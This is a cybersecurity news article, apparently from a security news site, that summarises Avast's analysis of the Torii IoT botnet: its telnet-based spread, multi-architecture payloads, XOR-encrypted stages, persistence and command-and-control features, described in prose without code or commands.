Saturday, May 18, 2024

Torii Botnet – A New Sophisticated IoT Botnet Attack in Wide – More Powerful Than Mirai

Most Sophisticated Torii Botnet discovered that spreading with more advanced techniques than famous Mirai Botnet but different than Mirai functionality.

Malware Authors developed Torii botnet with more stealthy and persistence capabilities unlike other botnets it doesn’t perform attacks such as DDOS or other attacks such take down the connected devices.

But this will compromise the victim’s network and steal the sensitive information and execute the command in order to perform various malicious activities through stong layered communication.

Researchers discovered that Torii botnet will support a wide range of target architectures, including MIPS, ARM, x86, x64, PowerPC, SuperH, etc.

Initially, it was hit in a telnet honeypot which is discovered by a security researcher, @VessOnSecurity who said, telnet attacks have been coming to his honeypot from Tor exit nodes so that it was named as “Torii”.

Torii Botnet Infection Process

Intially, Attack process starts by executing the Shellscript which is more sophisticated than normal botnets via telnet attack on the weak credentials.

Later it will trying to find out the architecture of the target by attempts to download payload for that device, interestingly Torii supports various device architectures including on x86_64, x86, ARM, MIPS, Motorola 68k, SuperH, PPC .

Mainly it attempt to compromise wide range of common architecture based IoT devices and it used to download many binary payload using several commands.

Torii Botnet using a bash script in order to redirect the infected victims device into malware hosted server.

Once the maware findout the architecture of the target device it downloads and executes the appropriate binary from the server and the payload will perfom only to download the second level of payload.

Both First and second stange of payload using XOR-based encryption and the second stage of payload alsoremain highly persistance which contain 6 methods to make sure the file remains on the device and always runs.

Also Second stage of payload is main contain the bot future that will communcate with its command & control sever to execute the command, also it have some futures such as anti-debugging techniques, data exfiltration, multi-level encryption of communication and many other evasion techniques.

According to logs that analyze by Avast, a total of 592 unique clients were downloading files from this server over a period of a few days. It’s important to remember that once the target device receives the payload, it stops connecting to the download server and connects to the CnC serve to get connect and perform based on it.

Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before. Avast said.

Also Read:

New Form of Mirai Malware Attacking Cross Platform By leveraging Open-Source Project

Mirai Based Botnet “OMG” Turns IoT Device into a Proxy Server


Latest articles

Norway Recommends Replacing SSLVPN/WebVPN to Stop Cyber Attacks

A very important message from the Norwegian National Cyber Security Centre (NCSC) says that...

New Linux Backdoor Attacking Linux Users Via Installation Packages

Linux is widely used in numerous servers, cloud infrastructure, and Internet of Things devices,...

ViperSoftX Malware Uses Deep Learning Model To Execute Commands

ViperSoftX malware, known for stealing cryptocurrency information, now leverages Tesseract, an open-source OCR engine,...

Santander Data Breach: Hackers Accessed Company Database

Santander has confirmed that there was a major data breach that affected its workers...

U.S. Govt Announces Rewards up to $5 Million for North Korean IT Workers

The U.S. government has offered a prize of up to $5 million for information...

Russian APT Hackers Attacking Critical Infrastructure

Russia leverages a mix of state-backed Advanced Persistent Threat (APT) groups and financially motivated...

Millions Of IoT Devices Vulnerable To Attacks Leads To Full Takeover

Researchers discovered four significant vulnerabilities in the ThroughTek Kalay Platform, which powers 100 million...
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Free Webinar

Live API Attack Simulation

94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise.
Key takeaways include:

  • An exploit of OWASP API Top 10 vulnerability
  • A brute force ATO (Account Takeover) attack on API
  • A DDoS attack on an API
  • Positive security model automation to prevent API attacks

Related Articles